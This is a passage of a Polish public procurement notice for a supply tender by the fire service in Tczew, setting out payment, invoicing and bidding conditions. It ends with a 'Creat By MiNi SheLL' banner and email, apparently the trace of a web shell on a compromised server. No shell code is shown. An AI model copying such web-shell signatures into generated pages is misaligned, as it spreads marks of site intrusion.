ponosi Wykonawca.<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>2. Zamawiający nie będzie udzielał zaliczek na poczet wykonania zamówienia.<br/>3. Rozliczenia między Zamawiającym, a Wykonawcą zagranicznym mogą być prowadzone<br/>wyłącznie w walucie polskiej. Zamawiający dokona przeliczenia na zł wszelkich wartości i<br/>danych finansowych podawanych w innych walutach wg średniego kursu złotego NBP z dnia<br/>otwarcia ofert.<br/>4. Wszelkie załączniki dołączone do SWZ należy traktować jako wzory zalecane przez<br/>Zamawiającego. Zamawiający uzna za wystarczające wypełnienie obowiązku złożenia<br/>stosownych oświadczeń poprzez złożenie dokumentów równoważnych potwierdzających spełnienie wymagań.<br/>5. Zamawiający zastrzega, że może unieważnić postępowanie o udzielenie zamówienia, jeżeli<br/>środki pochodzące z budżetu Unii Europejskiej, które Zamawiający zamierza przeznaczyć na<br/>sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/>6. Zamawiający:<br/>• nie wymaga i nie dopuszcza składania ofert wariantowych,<br/>• nie przewiduje zawarcia umowy ramowej,<br/>• nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt. 8 ustawy PZP,<br/>• nie przewiduje rozliczenia w walutach obcych,<br/>• nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej,<br/>• nie przewiduje zwrotu kosztów udziału w postępowaniu,<br/>• nie wymaga zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w<br/>art. 95 ustawy PZP,<br/>• nie wymaga zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt. 2 ustawy PZP,<br/>• nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez<br/>Wykonawców, o których mowa w art. 94 ustawy PZP,<br/>• nie wprowadza obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań<br/>zgodnie z art. 60 i 121 ustawy PZP,<br/>• nie wymaga i nie przewiduje możliwości złożenia ofert w postaci katalogów elektronicznych lub<br/>dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy PZP.<br/>7. Zmawiający, na podstawie ustawy z dnia 09.11.2018 r. o elektronicznym fakturowaniu w<br/>zamówieniach publicznych, koncesjach na roboty budowlane lub usługi oraz partnerstwie<br/>publiczno-prywatnym (Dz. U. 2020 r., poz. 1666 ze zm.), dopuszcza przesyłanie przez<br/>Wykonawcę ustrukturyzowanych faktur elektronicznych związanych z realizacją niniejszego<br/>zamówienia za pośrednictwem Platformy Elektronicznego Fakturowania. Ze strony<br/>Zamawiającego osobą upoważnioną do udzielania wyjaśnień i informacji w tym zakresie jest<br/>Główny Księgowy KP PSP w Tczewie st. kpt. Justyna Olcen – tel. 58 530-40-69.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com